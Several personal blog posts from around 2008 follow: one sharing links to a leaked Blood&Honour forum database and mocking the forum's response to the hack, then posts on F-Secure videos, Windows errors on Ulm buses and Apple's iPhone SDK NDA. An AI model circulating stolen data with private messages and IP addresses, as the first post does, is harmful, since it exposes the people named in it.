http://www.megaupload.com/?d=SKDPG4B0
http://www.megaupload.com/?d=EJ0DB1X5
The Rapidshare links are down. It seems the administrators of the site have done something against it. It is too late anyway; enough people have downloaded it already.
The forum of Blood&Honour is supposed to be back soon, but the comment they made on the stolen data is just too lame not to be mentioned:
In regards to any data that has been stolen off this website. Once any data, from whatever source, is downloaded onto a personal computer such as a hackers, that data can be changed and forged to anything that hacker wants. IP addresses can be changed; Private Messages can be altered or even created. The data is simply a text file that anyone can open and change on their computer.
To be precise, the forum was stored in a database, and as far as I know that is not a simple text file but a binary format used by MySQL. But hey, be fair, let the fascists believe all is fine and there is no risk for them. And besides: even if they think the data can't be used against them, it is possible to check whether something has been changed or not, so the argument doesn't hold, but well... When the administrators argue this way, no wonder they got hacked.
From RE:SOLUTION to E:VOLUTION

On the 9th of July 2007 the Scandinavian antivirus company F-Secure published a video called "F-Secure RE:SOLUTION" on its YouTube channel [fslabs]. Now, on the 28th of August 2008, they brought out a new version, called "F-Secure E:VOLUTION". I somehow enjoyed watching the new video and listening to Mikko stating that everything is getting worse... Now have fun yourself:
(F-Secure RE:SOLUTION)
(F-Secure E:VOLUTION)
Busses in Ulm using Windows
Before I go home for today, something funny for you. I took some pictures of the system used in the buses in Ulm (the city I live in).
First off, the normal way it looks when you press STOP to make the bus driver let you out:

Now the way it looks, when something goes wrong:

Can't you see what I mean? Look at the zoomed-in version below:

And finally when everything goes down, we have this:

Hope you liked it...
Apple's NDA: STFU!

Some people might already know it, for all the others: I am currently going deeper into OS X development, especially for the iPhone. The market is very interesting and growing rapidly; every manager wants an iPhone, and more and more companies use the iPhone for all their employees. Now I downloaded the SDK from Apple and the first videos to get started, everything fine so far and well done, BUT I had to sign an NDA (non-disclosure agreement) like every other developer, and that NDA is really strange. I really ask myself why Apple tries to control it that hard; it's a shot in their own foot. Anyway, read it yourself. This is what I got when I registered for the development mailing list on list.apple.com:
Until an announcement is made otherwise, developers should be aware that the iPhone SDK is still under non-disclosure (section 5.3 of the iPhone Development Agreement). It can't be discussed here, or anywhere publicly. This includes other mailing lists, forums, and also blogs. Violating the NDA will result in WWDR being notified of the breach. Further action is at their (and legal's) discretion. The iPhone SDK situation is somewhat different than a Mac OS X release, in that a Mac OS X release includes a copy of the developer tools with the distribution. The iPhone OS 2.0 release on devices and as an upgrade does _not_ include the development tools. As a result, the SDK is not automatically considered public because the release has occurred. Section 5.3 of the iPhone Development Agreement remains in force at this time, and will so remain until iPhone Developer Program members are specifically and personally notified by an authorized representative of Apple.

